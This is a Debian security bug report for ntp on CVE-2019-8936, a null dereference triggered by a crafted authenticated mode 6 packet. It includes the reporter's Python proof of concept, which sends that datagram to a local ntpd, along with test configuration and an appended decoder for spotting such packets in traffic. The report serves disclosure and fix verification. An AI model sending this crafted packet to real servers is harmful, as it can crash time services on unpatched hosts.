Source: ntp
Version: 1:4.2.8p12+dfsg-3
Severity: important
Tags: security upstream
Forwarded: http://bugs.ntp.org/show_bug.cgi?id=3565

Hi,

The following vulnerability was published for ntp.

CVE-2019-8936[0]:
Crafted null dereference attack in authenticated mode 6 packet

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

To verify/illustrate the issue/fix one can use the following as
provided by the reporter in the upstream report:

    #!/usr/bin/env python

    import sys
    import socket

    buf = ("\x16\x03\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x6c\x65\x61\x70" +
           "\x00\x00\x00\x01\x5c\xb7\x3c\xdc\x9f\x5c\x1e\x6a\xc5\x9b\xdf\xf5" +
           "\x56\xc8\x07\xd4")

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(buf, ('127.0.0.1', 123))

and running ntpd under valgrind as

    valgrind ntpd -n -c ~/resources/ntp.conf

with ntp.conf:

    logfile /tmp/ntp.log
    restrict 127.0.0.1
    keys /path/to/keys
    trustedkey 1
    controlkey 1
    requestkey 1

and keys

    1 M gurka
    2 M agurk

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2019-8936
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8936
[1] http://bugs.ntp.org/show_bug.cgi?id=3565
[2] http://bk.ntp.org/ntp-stable/ntpd/ntp_control.c?PAGE=diffs&REV=5c8106e7wWtXdh0lzg1ytlWribBTcQ

Please adjust the affected versions in the BTS as needed.

Regards,
Salvatore
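
Added example, not part of the original report or of the ntp source: a decoder for the mode 6 (control) datagram quoted above, showing which fields make it an authenticated request (its key ID 1 matches the controlkey in the quoted ntp.conf). It assumes the RFC 1305 Appendix B header layout with the authenticator starting at the next 32-bit boundary after the data; parse_mode6, REPORT_PACKET and the field names are my own.

```python
import struct

# The 36 bytes of the test datagram quoted in the report above.
REPORT_PACKET = bytes.fromhex(
    "160300030000000000000004"          # 12-byte control header
    "6c656170"                          # data
    "00000001"                          # key ID
    "5cb73cdc9f5c1e6ac59bdff556c807d4"  # MAC
)

# LI/VN/mode, R/E/M/opcode, sequence, status, association ID, offset, count
CTL_HEADER = struct.Struct("!BBHHHHH")
OPCODES = {1: "read status", 2: "read variables", 3: "write variables"}


def parse_mode6(datagram):
    """Decode an NTP control (mode 6) datagram; return None if it is not one."""
    if len(datagram) < CTL_HEADER.size:
        return None
    li_vn_mode, rem_op, seq, status, assoc, offset, count = \
        CTL_HEADER.unpack_from(datagram)
    if li_vn_mode & 0x07 != 6:
        return None
    # Assumption: data is padded to a 32-bit boundary and whatever
    # follows is the authenticator (4-byte key ID, then the MAC).
    data_end = CTL_HEADER.size + ((count + 3) & ~3)
    if data_end > len(datagram):
        return None  # count field claims more data than was received
    trailer = datagram[data_end:]
    key_id = struct.unpack("!I", trailer[:4])[0] if len(trailer) >= 4 else None
    return {
        "version": (li_vn_mode >> 3) & 0x07,
        "response": bool(rem_op & 0x80),
        "opcode": rem_op & 0x1F,
        "opcode_name": OPCODES.get(rem_op & 0x1F, "other"),
        "sequence": seq,
        "association_id": assoc,
        "data": datagram[CTL_HEADER.size:CTL_HEADER.size + count],
        "key_id": key_id,
        "mac_len": len(trailer) - 4 if key_id is not None else 0,
    }


if __name__ == "__main__":
    for field, value in parse_mode6(REPORT_PACKET).items():
        print(field, value)
```

The same function can be run over captured UDP/123 payloads to see which hosts send authenticated mode 6 requests to a server that has not yet been updated.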